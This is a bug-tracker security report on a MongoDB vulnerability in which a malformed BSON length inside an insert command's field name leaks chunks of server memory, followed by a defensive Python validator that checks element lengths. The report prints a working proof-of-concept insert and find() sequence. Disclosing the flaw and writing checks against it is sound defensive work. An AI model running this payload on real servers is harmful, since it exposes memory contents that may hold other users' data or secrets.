- Type: Bug
- Resolution: Done
- Priority: Major - P3
- Affects Version/s: None
- Component/s: None
- None
- ALL
Specialists at the Positive Research center have detected a "Server arbitrary memory reading" vulnerability in MongoDB.
Because the BSON document length in a column name of the insert command is handled incorrectly, it is possible to insert a record that contains base64-encoded chunks of server memory.
Example of use:
Suppose you have a table "dropme" with write permission.
Execute the following commands and view the result:
> db.dropme.insert(
{"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"})
> db.dropme.find()
After decoding the base64 data you get bytes from random chunks of server memory.
Credits
The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)
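The length problem described above can be seen with a bounds-checking BSON reader. The following is an added example, not part of the original report and not MongoDB's own code; `validate_bson` is a hypothetical name, it covers only string and binary elements, and it assumes the field-name bytes from the command above are meant to be read as a BSON document.

```python
import struct

# The byte string used as the field name in the report, treated here
# (an assumption) as one BSON document followed by a spare byte.
REPORTED_KEY = b"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00"
# Constructed counterpart whose binary length (5) matches its payload.
WELL_FORMED = b"\x16\x00\x00\x00\x05hello\x00\x05\x00\x00\x00\x00world\x00"


def validate_bson(buf):
    """Check the document at the start of buf; return None or a reason.

    Simplified: only element types 0x02 (string) and 0x05 (binary).
    """
    if len(buf) < 4:
        return "no room for the int32 document length"
    (doc_len,) = struct.unpack_from("<i", buf, 0)
    if doc_len < 5 or doc_len > len(buf):
        return f"document length {doc_len} does not fit {len(buf)} bytes"
    end = doc_len - 1  # offset of the document's trailing 0x00
    if buf[end] != 0:
        return "missing document terminator"
    pos = 4
    while pos < end:
        etype = buf[pos]
        if etype not in (0x02, 0x05):
            return f"unsupported element type 0x{etype:02x}"
        nul = buf.find(b"\x00", pos + 1, end)
        if nul == -1:
            return "unterminated element name"
        pos = nul + 1
        if pos + 4 > end:
            return "truncated element length"
        (n,) = struct.unpack_from("<i", buf, pos)
        pos += 4
        if etype == 0x05:
            pos += 1  # binary subtype byte
        # The declared length must be covered by bytes the sender supplied.
        if n < 0 or pos + n > end:
            return f"element length {n} runs past the document end"
        if etype == 0x02 and (n == 0 or buf[pos + n - 1] != 0):
            return "string value is not NUL-terminated"
        pos += n
    return None


if __name__ == "__main__":
    print("well-formed :", validate_bson(WELL_FORMED))
    print("reported key:", validate_bson(REPORTED_KEY))
```

The reported bytes declare a 22-byte document whose binary element claims far more data than the document holds; a reader that trusts that inner length without the bounds check reads past the bytes the client actually sent.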
- is duplicated by
  - SERVER-7691 Java driver is capable of crashing mongod with a simple insert (Closed)
  - SERVER-8272 Add command line option for "noObjcheck" (Closed)
- is related to
  - SERVER-6519 MongoDB Crash Under High Load (Closed)